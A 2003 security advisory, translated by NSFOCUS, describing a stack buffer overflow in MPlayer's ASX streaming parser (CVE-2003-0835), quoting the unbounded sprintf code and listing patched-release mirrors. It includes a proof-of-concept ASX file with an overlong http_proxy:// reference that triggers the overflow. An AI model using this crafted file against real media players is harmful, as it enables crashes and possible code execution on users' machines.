MPlayer Streaming ASX Header Field Parsing Buffer Overflow Vulnerability

Published: 2003-09-25
Updated: 2003-10-09

Affected systems:
MPlayer MPlayer 1.0 pre1
MPlayer MPlayer 0.90 rc4
MPlayer MPlayer 0.90 rc series
MPlayer MPlayer 0.90 pre series
MPlayer MPlayer 0.90
MPlayer MPlayer 0.91
    - Mandrake Linux 9.2
Unaffected systems:
MPlayer MPlayer 0.92
Description:
BUGTRAQ  ID: 8702
CVE(CAN) ID: CVE-2003-0835

MPlayer is a Linux-based movie player.

MPlayer mishandles malformed header fields in a streaming ASX file. A remote attacker can exploit this by inducing a user to open a crafted ASX file, which triggers a buffer overflow in the player.

The problem is that the asf_http_request function in asf_streaming.c lacks proper bounds checking on a fixed-size stack buffer. The relevant excerpt (elided parts marked "...") is:

asf_http_request {
        char str[250];                 /* fixed-size stack buffer */
        ...
        /* unbounded sprintf: no check that hostname and port fit in 250 bytes */
        sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port );
        ...
        /* second site, same unbounded pattern */
        sprintf( str, "Host: %s:%d", url->hostname, url->port );
        ...
}

Because MAXHOSTLEN limits the length of a hostname, the code looks unexploitable at first glance. However, an ASX file whose reference uses the http_proxy:// form with a proxy of "badsite" on "badport" (as in the test file below) still reaches the overflow. A carefully constructed ASX file that a user is induced to open can therefore execute arbitrary instructions on the system with the privileges of the user running MPlayer.

<*Source: Otero, Hernan (hernan.otero@eds.com)

  Link: http://www.mplayerhq.hu/homepage/design6/news.html
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use it at your own risk!

Otero, Hernan (hernan.otero@eds.com) provided the following test method:

<asx version = "3.0">
<title>Bad Site ASX</title>

<moreinfo href = "mailto:info@badsite.com" />
<logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
<banner href= "images/bannermitre.gif">
<abstract>Bad Site live</abstract>
<moreinfo target="_blank" href = "http://www.badsite.com/" />
</banner>

<entry>
<title>NEWS</title>
<AUTHOR>NEWS</AUTHOR>
<COPYRIGHT>© All by the news</COPYRIGHT>
<ref href = "http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"/>
<logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
</entry>
</asx>

Recommendations:
Vendor patch:

MPlayer
-------
Download MPlayer 0.92 or the latest CVS snapshot, which fixes this vulnerability:

Hungary 1, HTTP -> http://www1.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
Hungary 1, FTP -> ftp://ftp1.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
Hungary 2, HTTP -> http://www2.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
Hungary 2, FTP -> ftp://ftp2.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
USA, HTTP -> http://ftp3.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
USA, FTP -> ftp://ftp3.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
Switzerland, HTTP -> http://www4.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
USA2, HTTP -> http://ftp5.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
USA2, FTP -> ftp://ftp5.mplayerhq.hu/MPlayer/releases/MPlayer-0.92.tar.bz2
Australia, FTP -> ftp://ftp6.mplayerhq.hu/pub/mplayer/releases/MPlayer-0.92.tar.bz2
Finland, HTTP -> http://www7.mplayerhq.hu/pub/mplayer/releases/MPlayer-0.92.tar.bz2

This vulnerability entry was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.